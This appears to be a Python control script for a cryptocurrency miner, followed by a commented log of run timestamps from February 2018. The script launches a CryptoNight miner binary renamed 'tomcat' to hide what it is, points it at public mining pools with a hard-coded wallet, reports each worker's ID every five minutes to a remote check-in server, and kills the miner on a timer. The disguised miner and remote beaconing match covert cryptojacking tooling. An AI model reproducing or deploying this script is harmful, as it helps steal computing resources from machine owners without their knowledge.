import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:56:07.377379
#2018-02-17 16:43:04.256003
#2018-02-17 18:31:03.808795
#2018-02-17 20:20:01.540770
#2018-02-17 22:07:01.565506
#2018-02-17 23:51:05.780564
#2018-02-18 01:42:05.009783
#2018-02-18 03:29:04.838602
#2018-02-18 05:17:03.716472
#2018-02-18 07:09:05.237772
#2018-02-18 08:57:06.848083
#2018-02-18 10:44:01.758301
#2018-02-18 12:31:04.756615
#2018-02-18 14:18:04.252405
#2018-02-18 16:09:04.574895
#2018-02-18 17:58:05.095589
#2018-02-18 19:44:06.271724
#2018-02-18 21:32:01.994709
#2018-02-18 23:21:04.712427
#2018-02-19 01:08:06.319835
#2018-02-19 02:54:07.525056
#2018-02-19 04:40:08.905973
#2018-02-19 06:24:06.309698
#2018-02-19 08:13:04.004454
#2018-02-19 10:03:06.249740
#2018-02-19 11:52:01.481012
#2018-02-19 13:40:01.529205
#2018-02-19 15:27:08.641413
#2018-02-19 17:15:05.650947
#2018-02-19 19:03:09.570928
#2018-02-19 20:49:05.012906
#2018-02-19 22:37:05.838444
#2018-02-20 00:21:07.651972
#2018-02-20 02:10:07.360191
#2018-02-20 04:01:01.732355
#2018-02-20 05:44:06.067046
#2018-02-20 07:29:02.158938
#2018-02-20 09:13:06.810831
#2018-02-20 10:57:04.106314
#2018-02-20 12:44:10.485725
#2018-02-20 14:28:08.862528
#2018-02-20 16:14:06.970674
#2018-02-20 18:02:08.920986
#2018-02-20 19:54:07.245226
#2018-02-20 21:41:07.933442
#2018-02-20 23:23:06.026604
#2018-02-21 01:07:03.888141
#2018-02-21 02:53:06.261335
#2018-02-21 04:41:06.099946
#2018-02-21 06:29:01.849087
#2018-02-21 08:13:07.171547
#2018-02-21 10:00:08.664837
#2018-02-21 11:48:09.005071
#2018-02-21 13:39:01.368145
#2018-02-21 15:22:05.583023
#2018-02-21 17:11:10.239461
#2018-02-21 18:59:02.202238
#2018-02-21 20:47:07.214370
#2018-02-21 22:32:08.258273
#2018-02-22 00:22:07.498517
#2018-02-22 02:11:07.272999
#2018-02-22 03:56:07.829183
#2018-02-22 05:43:05.105498
#2018-02-22 07:28:07.240928
#2018-02-22 09:16:06.050617
#2018-02-22 11:03:08.225916
#2018-02-22 12:49:10.500356
#2018-02-22 14:34:08.412837
#2018-02-22 16:21:07.991028
#2018-02-22 18:08:06.605254
#2018-02-22 19:57:01.792904
#2018-02-22 21:46:05.203727
#2018-02-22 23:34:02.171136
#2018-02-23 01:21:08.582419
#2018-02-23 03:08:04.263066
#2018-02-23 04:54:06.758691
#2018-02-23 06:40:09.046740
#2018-02-23 08:29:07.636126
#2018-02-23 10:46:04.333673
#2018-02-23 12:42:02.247878
#2018-02-23 14:26:02.179066
#2018-02-23 16:17:03.884515
#2018-02-23 18:03:01.567974
#2018-02-23 19:48:07.549328
#2018-02-23 21:33:01.728626
#2018-02-23 23:20:07.713095
#2018-02-24 01:13:01.663881
#2018-02-24 03:03:03.872483
#2018-02-24 04:49:01.564053
#2018-02-24 06:34:05.878707
#2018-02-24 08:23:07.340829
#2018-02-24 10:07:01.303787
#2018-02-24 12:04:03.841127
#2018-02-24 13:51:06.010035
#2018-02-24 15:46:07.132998
#2018-02-24 17:39:07.023231
#2018-02-24 19:25:03.710686
#2018-02-24 21:15:04.209064
#2018-02-24 23:51:07.343268
#2018-02-25 03:09:06.306138
#2018-02-25 06:52:05.649727